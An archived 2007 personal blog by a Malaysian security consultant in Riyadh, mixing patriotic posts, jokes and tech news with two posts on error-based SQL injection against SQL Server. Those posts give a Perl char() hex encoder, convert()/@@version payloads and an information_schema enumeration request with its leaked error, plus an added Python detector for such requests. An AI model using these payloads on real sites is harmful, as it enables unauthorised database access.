Friday, August 31, 2007

Happy 50th Independence Day Malaysia

Every year, the 31st of August is the day when all Malaysians come together to celebrate their nation’s Independence Day - some of us call it National Day. This year Malaysia will again celebrate its birthday - 50 years of independence, to be exact, from Japanese and British colonization.

Malaysia has come a long way to get to where it is now - a modern nation full of vibrant, colorful culture and people. From a nation that depended so much on agriculture to a developing country full of promise in many areas of the economy, Malaysia has achieved so many things over the years.

Today, I am calling out to all Malaysian bloggers - let us show some love to our nation and display our patriotism on our blogs. Let us be proud to be Malaysian and show the same pride, courage and honor as our 'Bapa Kemerdekaan' Tunku Abdul Rahman and all the previous Malaysian citizens during their time.


Perjuangan Yang Belum Selesai (The Unfinished Struggle)

Truly, nothing is more heart-rending
than seeing my people colonized
Nothing is more sorrowful
than letting my people be humiliated

Tears mean nothing
past history has no meaning
if the beloved people are sidelined
mocked and forgotten

No small steps were those of the nation's heroes
the fighters for independence
to uphold the honor
and standing of the people
each step meant advancing
braving a million trials

Let the steps be faltering
so long as they are sure and careful
to ensure the country
is independent and the people protected
tears of suffering
accompanied every step of our fathers

Our task is not small
for giving substance to independence
turns out to be harder than bathing
in sweat and blood to claim it

Besides, what does independence mean
if my people only say yes and no,
nod and agree,
for however proud the country is
of its prosperity and wealth,
my people still crawl
and beg in their own land

Our task is not small
to continue our struggle for independence
for it turns out that, beyond winning freedom,
giving substance to independence is far more painful

My people are not small in heart and spirit
have they not, through the ages,
been seafarers, wanderers,
even renowned conquerors?
Have they not spread their wings,
becoming traders and merchants
as well as becoming religious scholars and
distinguished men of learning?
Did my people not once cross
the oceans, colonizing an unknown world
Were they not once
heroes of the region who did not know
the meaning of fear and death?
Where did it go wrong, that my people
feel so small and inferior?
Was it the doing of the colonizers?
And so my people began
to forget the glory of the past
and the glorious history of building an empire

Our task, it seems, is not yet done
to dignify and
honor the people
for only a people that succeeds
will always be respected

It seems our road is still long and winding
not merely to win independence and give it substance
but to raise standing and honor
for all time

Today, this road is surely more winding still
for the future does not necessarily
promise paradise
to those who are weak and easily disheartened

Our struggle is not yet over
for only the steadfast and resilient
can build the landmark
of a successful people

Dr. Mahathir Mohamad
May 1996

Tuesday, August 28, 2007

SQLinjection -- convert method (continue)

My friend told me to encode some of the injection parameters from ASCII to hex code. So I wrote a small Perl script to do the job for me:

shaolinint@slash$ cat ascii2hex.pl
#!/usr/bin/perl
use strict;
use warnings;
my $cmd = shift or die "usage: $0 string\n";
# Each character becomes char(0xNN) followed by %2B (URL-encoded '+').
# %% prints a literal '%'; %02x zero-pads values below 0x10.
$cmd =~ s/(.)/ sprintf("char(0x%02x)%%2B", ord($1)) /ge;
chomp($cmd);
print "$cmd\n";

shaolinint@slash$ perl ascii2hex.pl table1
char(0x74)%2Bchar(0x61)%2Bchar(0x62)%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31)

I had to remove the '%2B' at the end of the code above to make it work on real injections:

shaolinint@slash$ lynx -dump http://www.target.com/hello.aspx?id=(convert(varchar(255),(SELECT+top+1+table_name+FROM+
information_schema.tables+WHERE+table_name+NOT+IN(char(0x74)%2Bchar(0x61)%2Bchar(0x62)
%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31))))--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '{]table2 to a column of data type int.

The injection parameter is working fine for me. But there is a small problem: I still cannot get the data from all tables and columns at the moment.

Monday, August 27, 2007

SQLinjection -- convert method

Last Saturday I started a Portal Security Assessment for one of my clients here in Saudi. And last night I completed a validation of all my findings. What made the assessment interesting is that I found a potential SQL injection on the portal, which is a good thing for me... But the challenge is to enumerate tables and columns manually, since most of the tools that were supposed to get the information failed to do so.... So I tried manually and played around with the injections, but I still couldn't get what I wanted.

During my homework, I found a few interesting ways to print some of the information. If you have any idea how to use the following methods to enumerate tables and columns, please let me know.

convert(int,convert(varchar,INJECTION_PARAMETER_HERE))
(convert(varchar(255),(INJECTION_PARAMETER_HERE)))--

For example:

http://microsoft.com/hello.asp?id=convert(int,convert(varchar,@@version))

http://microsoft.com/hello.asp?id=(convert(varchar(255),(@@version)))--
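
A defender's view of the request forms in these two posts, as an added example that is not part of the original blog: a Python check for web-server logs that flags convert() casts, server-metadata names and char(0x..) concatenation in query parameters, and decodes each char() chain back to the literal it hides from keyword filters. The sample requests, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed request lines modelled on the forms in the posts; hosts omitted.
SAMPLE_REQUESTS = [
    "/hello.asp?id=42",
    "/hello.asp?id=convert(int,convert(varchar,@@version))",
    "/hello.aspx?id=(convert(varchar(255),(SELECT+top+1+table_name+FROM+"
    "information_schema.tables+WHERE+table_name+NOT+IN(char(0x74)%2Bchar(0x61)"
    "%2Bchar(0x62)%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31)))))--",
    "/search.asp?q=how+to+convert+units",
]

NUM = r"(?:0x[0-9a-f]+|\d+)"
# One or more char(N) calls joined by '+', the T-SQL string concatenation.
# The \b keeps "varchar(255)" from being read as a char() call.
CHAR_CHAIN = re.compile(
    rf"\bchar\(\s*{NUM}\s*\)(?:\s*\+\s*char\(\s*{NUM}\s*\))*", re.I)
CHAR_ARG = re.compile(rf"char\(\s*({NUM})\s*\)", re.I)

RULES = {
    # A cast wrapped around request text: the conversion error echoes the value.
    "convert-cast": re.compile(r"\bconvert\s*\(\s*(?:int|n?varchar)\b", re.I),
    # Server metadata names have no business in a request parameter.
    "server-metadata": re.compile(r"@@version|\binformation_schema\.", re.I),
    # Trailing comment that cuts off the rest of the original statement.
    "sql-comment-tail": re.compile(r"--\s*$"),
}


def decode_char_chain(chain):
    """Turn char(0x74)+char(0x61)+... back into the literal it spells."""
    out = []
    for arg in CHAR_ARG.findall(chain):
        code = int(arg, 16) if arg.lower().startswith("0x") else int(arg)
        out.append(chr(code) if code < 0x110000 else "?")
    return "".join(out)


def inspect_request(request_target):
    """Return one finding per query parameter that matches any rule."""
    findings = []
    query = urlsplit(request_target).query
    # parse_qsl percent-decodes and maps '+' to space, so %2B becomes '+'.
    for name, value in parse_qsl(query, keep_blank_values=True):
        rules = [rid for rid, rx in RULES.items() if rx.search(value)]
        literals = [decode_char_chain(m.group(0))
                    for m in CHAR_CHAIN.finditer(value)]
        if literals:
            rules.append("char-concat")
        if rules:
            findings.append({"param": name, "rules": rules,
                             "decoded_literals": literals})
    return findings


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req[:60], "->", inspect_request(req) or "clean")
```

The decoded literal is what makes the alert readable during triage: the analyst sees the table name the request was filtering on instead of a run of hex.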

Saturday, August 25, 2007

Chinese Pirates Copy iPhone, Make Improvements

"Popular Science notes that manufacturers in China duplicate many well-known products. This includes the Apple iPhone, imitations of which are rolling off the assembly line already. That might actually be a good thing for some users, who might enjoy the user experience of China's own miniOne. 'It ran popular mobile software that the iPhone wouldn't. It worked with nearly every worldwide cellphone carrier, not just AT&T, and not only in the U.S. It promised to cost half as much as the iPhone and be available to 10 times as many consumers.' The cloned iPhone uses a Linux-based system. 'The cloners hire a team of between 20 and 40 engineers to begin decoding the circuit boards. At the same time, coders start to develop an operating system for the phone with a similar feature set. (The typical cloner either uses off-the-shelf code, writes something entirely new, or modifies a publicly available Linux-based system.)' Using the iPhone as an example, the PopSci site walks through the process of making imitation technology."

Chaos Communication Congress 2007: Call for Participation

The 24th Chaos Communication Congress (24C3) is the annual four-day conference organized by the Chaos Computer Club (CCC) in Berlin, Germany. First held in 1984, it since has established itself as “the European Hacker Conference”. Lectures and workshops on a multitude of topics attract a diverse audience of thousands of hackers, scientists, artists, and utopists from all around the world. The 24C3's slogan is Volldampf voraus! – the German equivalent of “full steam ahead” – a particular request for talks and projects featuring forward looking hands-on topics. The Chaos Computer Club has always encouraged creative and unorthodox interaction with technology and society, in the good tradition of the real meaning of “hacking”.

Topics
The 24C3 conference program is roughly divided into six general categories. These categories serve as guidelines for your submissions (and later as a means of orientation for your prospective audience). However, it is not mandatory for your talk to exactly match the descriptions below. Anything that is interesting and/or funny will be taken into consideration.

More info here and here.

Friday, August 24, 2007

What Hackers Learn that the Rest of Us Don't

Sergey Bratus contrasts developers and academic programs with what "hackers" do in his article titled "What Hackers Learn that the Rest of Us Don't" in the July/August 2007 IEEE Security and Privacy magazine. For example:

  • Developers are under pressure to follow standard solutions, or the path of least resistance to "just making it work."

  • Developers are de facto trained to ignore or avoid infrequent border cases and might not understand their effects.

  • Developers might receive explicit directions to ignore specific problems as being in other developers' domains.

  • Developers often lack tools for examining the full state of the system, let alone changing it outside of the limited API.

  • If you understand this statement:

    "In a typical academic setting... an ever-increasing number of topics limits the time the students and teachers can allocate for any specific one."

    oh wait! it's FTV midnight hot......... I'll make it quick. Read this post.

    Wednesday, August 22, 2007

    WinOSX


    I really like the OSX interface.. I think it's cool and the best interface for the desktop. Because of that, I configured my Windows to look just like MacOS.

    Sunday, August 19, 2007

    Lost for Mont Blanc

    Last night my friend and I went to Granada Center, one of the largest shopping malls in Riyadh. After driving to nowhere.. we kind of got a bit lost because my friend enjoyed his story and made me lose my way and forget our destination. After a few hours of driving we thought we had missed the exit to Granada, so we kept driving until we found a U-turn. I checked my watch and it was almost 9:30pm in Riyadh... Wooppss!!! I saw Granada and the 4 mini KLCC towers, it's like magic! I like Saudi's.. miracles are everywhere, hehehe. We are there! Masha Allah! But anyway... it drove me crazy, I saw these sunglasses.. the shape is just like Jessica Alba's, Mont Blanc... pretty cool... So I asked the salesman for the price... Masha Allah.. Can you imagine how much the price is for Mont Blanc sunglasses?? oh man!!! oh man!!! oh man!!! Long story short, I decided to take the sunglasses home with me. Once in a lifetime :)

    Saturday, August 18, 2007

    Voip Rakyat

    My friend (rosli) asked me to download and use voip rakyat a few days ago. But I only had the opportunity to test it today.

    So, he called me and we started our conversation. After a few minutes... I really liked the results. I'm impressed! His voice is clear, and my video (webcam) movement is faster than on Yahoo Messenger and Skype. Well... at least on my computer. Another great release from Indonesian folks. Five-star rating from me. Highly recommended if you are a voip lover. More info here.

    My voip rakyat info:
    Name: shaolinint
    Username: 55543
    Line speed: 128 kbs
    Call Location: Riyadh, Saudi Arabia
    Call Destination: Kuala Lumpur, Malaysia

    Friday, August 17, 2007

    Specialist Doctor

    Patient: "Doctor, how long will it take for my cracked bone to heal?"
    Doctor: "Six weeks at the earliest."
    Patient: "Once I have recovered, will I be able to play music skillfully as usual?"
    Doctor: "Oh .... of course!"
    Patient: "Great! Because before this I had never played music."

    Wednesday, August 15, 2007

    Jealousy

    I feel that wives really shouldn't behave like this. Just going straight to the beating! Not right, not right!

    A wife wanted to contact her husband, but her phone had no credit, so she told her son to pass an important message to the husband, who was working on site.

    After the son made the call, he told his mother that another woman had answered the phone. Although the son called again and again, it was still that woman who answered.

    The wife then waited angrily at the front door for her husband to come home from work. As soon as the husband arrived, the wife beat him thoroughly for his cheating.

    All the neighbors gathered in front of the house to watch that evening's drama. The wife told her son to tell everyone what the woman on the line had said.

    The son said: "Sorry, the number you have dialed is outside the coverage area. Please try again later."

    Flight Engineer

    When we are in the airport, a lot of times we can see the pilots and cabin crew walking by us and begin admiring their glamorous career on board the aircraft, but do we know who is the one responsible for the maintenance aspect of the aircraft that they are working on? That person is the Licensed Aircraft Maintenance Engineer; he is the one responsible for making sure that an aircraft is safe to fly, to carry passengers or cargo from one point to another, and I know and have met one of them, Brother Helmi. If you think you know everything about flight and glamorous careers, you're wrong. Take a journey to his website, you're gonna like it.

    Tuesday, August 14, 2007

    School pupils

    Class A:
    Teacher: If your father earns RM80 a week and gives your mother half, what does your father get?

    Pupil: WAR!!

    Class B:
    Teacher: I want you to tell us about your mothers.
    Pupil A: My mother is a loving person but nags a lot.

    Pupil B: (earnestly) My mother, on the other hand, is really beautiful but still isn't married. (^-^)

    Class C:
    Teacher: All right, pupils... today we will learn ABC.
    Pupil C: I don't like ABC, teacher, do you have cincau?

    Why Islam

    I think this is a must-see video. Now I know why most Saudi women are not working. It is because they choose not to work.

    Betranos Petrol Station

    Rahman works at the Betranos petrol station on Jalan King Fahad, Riyadh. He always serves customers who want to fill their cars with petrol. One day the petrol at the station ran out, and they had to wait another 4 hours for it to be refilled. Rahman would tell customers that the petrol had run out. Suddenly an Arab customer arrived with his vehicle. Rahman was a little relieved, only because he had thought the Arab man would bring a camel. But Rahman also panicked, because he did not know how to speak Arabic. Finally an Arabic phrase commonly used to indicate that something is finished came to mind. Rahman said to the Arab man: "Sir, the petrol is finished, SADAQALLAHULLA'ZIMMM".

    Monday, August 13, 2007

    Peribajau 3: Semmut Keyat

    Semmut Keyat - pronounced Semut K-Yat, meaning 'Red Ant'. I got the idea for this peribajau because I have a friend here in Riyadh who is utterly frustrated that he can't go back to Malaysia because of a problem that is not yet resolved. I feel sorry for him...

    I don't think I need to explain at length; it's just that this peribajau is not about two people in love, but is actually about people who feel they are big and powerful versus people who have nothing or "own nothing". You get the idea. Listen to this song and take in its lyrics, okay?

    Sunday, August 12, 2007

    vSwitch

    VMware has opened development of ESX virtual switches to third-party vendors, and Cisco is expected to be the first company to announce such a product, perhaps a Virtual Catalyst?

    You must read this and this.

    "A virtual switch, vSwitch, works much like a physical Ethernet switch. It detects which virtual machines are logically connected to each of its virtual ports and uses that information to forward traffic to the correct virtual machines. A vSwitch can be connected to physical switches using physical Ethernet adapters, also referred to as uplink adapters, to join virtual networks with physical networks. This type of connection is similar to connecting physical switches together to create a larger network. Even though a vSwitch works much like a physical switch, it does not have some of the advanced functionality of a physical switch. For more information on vSwitches"

    To me, again it will be a new security issue of course. We'll see...

    uDc team members


    MegaGath is over! I couldn't participate this time but some of the uDc team members were there. It's not a security conference or similar; it's just a gathering and celebration for one of our friends who is going to leave the country very soon.

    I wish him all the best and hope he will find his soul mate.

    There is good news too: CursedDaemon (picture: left), the youngest team member of uDc, is now back in town. He is now continuing his studies. Wish him all the best too!

    I miss all you guys, especially CursedDaemon, my vocabulary. I hope I'll see him when I get back to Malaysia and have a teh tarik at the mama stall.

    Tuesday, August 7, 2007

    Wish You Were Here

    Pink Floyd song cover by Marty Casey. This song reminds me of my family and my home town.

    So... so you think you can tell, Heaven from Hell, blue skies from pain.. Can you tell a green field.. from a cold steel rail? A smile from a veil? Do you think you can tell? And did they get you to trade.. your heroes for ghosts? Hot ashes for trees? Hot air for a cool breeze? Cold comfort for change? And did you exchange.. a walk on part in the war, for a lead role in a cage? How I wish, how I wish you were here. We're just two lost souls swimming in a fish bowl, year after year, Running over the same old ground. What have we found? The same old fears. Wish you were here.....

    Pidgin


    I like pidgin for chatting whenever I'm running Linux.

    add debuntu repo and gpg key:

    slash@shaolinint# echo 'deb http://repository.debuntu.org/ feisty multiverse' >> /etc/apt/sources.list
    slash@shaolinint# wget http://repository.debuntu.org/GPG-Key-chantra.txt -O- | apt-key add -


    update repo and install pidgin:

    slash@shaolinint# apt-get update
    slash@shaolinint# apt-get install pidgin

    And that's it, simply 1 2 3 :)

    Wednesday, August 1, 2007

    Hackers On A plane

    2007 is a very special year for the global hacker community. Thanks to cooperation between the organizers of DefCon XV and the Chaos Communications Camp 2007, the two largest gatherings of hackers from around the world happen only a few days apart!

    This is where "Hackers on a Plane" comes in: The Hacker Foundation has put together a complete travel package to help bring together hackers from around the world for ten days of fun, culture and community. We see it as the first step to building a truly global hacker community.

    More information here.

    Peribajau 2: Angenda' Bunga Ros Ma Langit

    This is a powerful peribajau, bro, just about to be entered into the Bajau language dictionary:

    "Angenda' Bunga Ros Ma Langit", or in Malay "Merenung bunga ros di langit" (gazing at the rose in the sky)


    This PeriBajau means: repent, O people, worship much and do good to one another. This PeriBajau is usually also reinforced with Quranic verses and hadith.


    Among the signs of the Day of Judgment, Allah S.W.T. says:

    "Moreover, it will truly be (terrifying) when the sky splits apart and becomes a red rose, gleaming like oil"

    This picture was captured accidentally by NASA (pretending it was an accident, no less); an object in the sky that broke apart in the past few months was reported in the Al-Ahram newspaper and on the NASA website.

    Don't do bad things any more, stop the hacking and the chasing after girls.. it's not good, stop now before you get stopped. Enough already, or I'll report you to your mothers; aren't you afraid your mother will cane you with a rotan? It hurts, bro! I felt it when I was little, always getting caned with the rotan for playing in the mud. One more thing, my mother always pinched me on the thigh, phew! Really great, bro, it felt like I wanted more; it's just that the girl had fallen for me, but I was the one who got it, hehehehe....

    PeriBajau

    Life in Riyadh is a bit boring, bro. Oops, wrong, not a bit boring but crazy boring, Din Beramboi level, bro. You could end up turning into a desert camel if you don't know how to adapt. So, I want to make up my own proverbs to fill my free time, which is as wide open as this Saudi desert. If you have no free time, especially those of you who work so hard you forget your wife and kids, you can take as much of my free time as you like.

    If you don't like it, never mind, because I make up these proverbs however Din Beramboi's mum and dad please, which side I don't even know, but as far as I remember a little to the right-hand side; if you walk straight on you reach Dato' K's house, but if you take the back way I think you can meet the desert camels. So, don't get clever and try to correct my proverb terms. I have named this proverb term "PeriBajau".

    I have to name the language I created; if I don't name it, who will! Waiting for you lot to name it is something I can't use or count on at all. But I know the name is really great... you don't need to praise me and butter me up. I've already done a survey: 110% said this term is crazy good; if you don't believe it, try asking the late neighbor next door to you. What's more, my peribajau is hard to create and develop, bro, enough to crack Bill Gates's stone head.

    Okay, I hope you understand this peribajau. If you still don't understand, that's a sign you're about to go far away. As the late P. Ramlee said, by my reckoning, it'll be this Friday. So, if you don't understand, just pretend you do.

    My first PeriBajau is "Mag Parking-parking Ma Padang Pasir". This PeriBajau means parking a car the way a camel rests in the desert. For those who have never seen a camel resting in the desert, this peribajau means "I'll park however I like, I'm the one driving the car and you can park a bit further away or block my car". For example, like in this picture:


    I hope you can start using this peribajau.

    Lastly, I want to say syukran jazila to bro Helmi; it was bro Helmi who caught this picture. I don't know how he caught it, but what's certain is he didn't call the police like you lot; want to catch something, call the police, want to catch something, call the police, so behind the times! It's modern now, bro... everything is at your fingertips. You get the idea. So, those with long nails whose fingertips can't reach the keyboard, hurry up and cut your nails. Otherwise, don't hope to use our generation's technology.

    Okay, enough for today, I have 24 hours each day, not 25. Don't forget to comment! Just comment.. don't get clever and bad-mouth me, or I'll beat you up! Enough! Go make a baby, so many excuses! I'm going to sleep, tomorrow I'm having breakfast at Al-Malas Restaurant, enjoying a teh tarik. What to do, there's nowhere else; even now the curry has started dripping from my armpits! hehe..